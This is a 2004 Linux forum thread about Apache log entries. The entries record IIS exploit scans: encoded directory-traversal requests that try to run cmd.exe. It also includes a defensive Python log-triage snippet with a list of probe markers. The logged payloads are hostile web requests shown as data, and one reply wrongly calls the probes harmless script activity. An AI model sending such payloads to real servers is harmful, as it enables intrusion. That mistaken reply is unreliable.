LinuxQuestions.org


Zaius 01-26-2004 02:11 PM

should i be concerned
 
this is a log from my apache logs.

24.0.77.100 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299
24.0.77.100 - - [26/Jan/2004:02:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297
24.0.77.100 - - [26/Jan/2004:02:19:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:19:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
24.0.77.100 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:03 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
24.0.77.100 - - [26/Jan/2004:02:20:09 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 354
24.0.77.100 - - [26/Jan/2004:02:20:12 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
24.0.77.100 - - [26/Jan/2004:02:20:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:35 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 311
24.0.77.100 - - [26/Jan/2004:02:20:38 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
24.0.77.100 - - [26/Jan/2004:02:20:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321

should i be concerned that someone is 'trying' to find what could be important files, if this were a windows machine.

what constitutes something i should take action towards? this guy's not too bright obviously.. but still.. does snooping around like this happen often?

other question.. can i block my own ip from being logged? as 80% or more of the log is either my cable IP, eth0 IP or loopback's IP.. so it would be nice if i just saw what other people were doing.

chrisk5527 01-26-2004 02:25 PM

It doesn't look like someone is snooping around your system. The reason why I say this is because it looks like there is access to a scripts directory through your web server setup. A script might be executing cmd.exe to run correctly. I'm not sure what software you're using as your web server, but to my knowledge, I don't believe you can omit your own IP address from a log.

Khabi 01-26-2004 02:35 PM

No, you really don't need to be worried about it. They're scanning for IIS exploits, they really don't apply to you :)
I run a webserver and get that a lot, it's mostly just script-kiddies looking around for an *easy hack*. Maybe jot down the IP that the scan came from and keep an eye out for other scans from the same general IP address. If it gets to be a problem bring it up w/ the ISP.
If you start seeing Apache-specific exploits then you should start being a little more worried. Just keep an eye on your secure and message log files for unusual stuff.

All in all you're fine tho. You'll probably see a lot more of those.
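
The triage described above (note which address the scan came from, check whether anything was actually served), as an added example that is not part of any post in this thread. It also skips your own addresses at analysis time, which bears on the second question in the first post. The function names, the marker list and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format, as in the lines posted in the thread.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Substrings typical of the Windows/IIS probes shown in the thread.
IIS_MARKERS = ("cmd.exe", "root.exe", "/winnt/", "/_vti_bin/", "/msadc/", "/_mem_bin/")
# Constructed sample lines modelled on the thread (documentation-range IPs).
SAMPLE = [
    '203.0.113.7 - - [26/Jan/2004:02:19:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299',
    '203.0.113.7 - - [26/Jan/2004:02:20:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321',
    '192.0.2.10 - - [26/Jan/2004:02:21:00 -0500] "GET /index.html HTTP/1.1" 200 1024',
]

def full_decode(path, max_rounds=5):
    """Percent-decode repeatedly so double encodings such as %255c end up as a backslash."""
    for _ in range(max_rounds):
        decoded = unquote(path, encoding="latin-1")
        if decoded == path:
            break
        path = decoded
    return path

def classify(path):
    """Return the reasons (possibly none) a request path looks like an IIS probe."""
    once = unquote(path, encoding="latin-1")
    decoded = full_decode(path).lower().replace("\\", "/")
    reasons = {m for m in IIS_MARKERS if m in decoded}
    if "../" in decoded:
        reasons.add("traversal")
    if full_decode(path) != once:
        reasons.add("multi-encoded")
    return reasons

def summarize(lines, own_ips=()):
    """Group probe requests by client IP, ignoring any address listed in own_ips."""
    report = defaultdict(lambda: {"hits": 0, "served": 0, "reasons": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group(1) in own_ips:
            continue
        ip, path, status = m.groups()
        reasons = classify(path)
        if reasons:
            report[ip]["hits"] += 1
            report[ip]["reasons"] |= reasons
            # A 2xx answer to a probe is the case that deserves a closer look.
            report[ip]["served"] += int(status.startswith("2"))
    return dict(report)
```

Calling `summarize(SAMPLE, own_ips={"192.0.2.10"})` returns one entry per scanning address; a non-zero `served` count means a probe path returned content instead of a 404 or 400.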

Zaius 01-26-2004 02:40 PM

ok thanks..

although i don't have a scripts folder within my webpage directory.. so that's why i was wondering why they'd be trying to look for something in there..

i am using apache2 on fedora linux.


All times are GMT -5.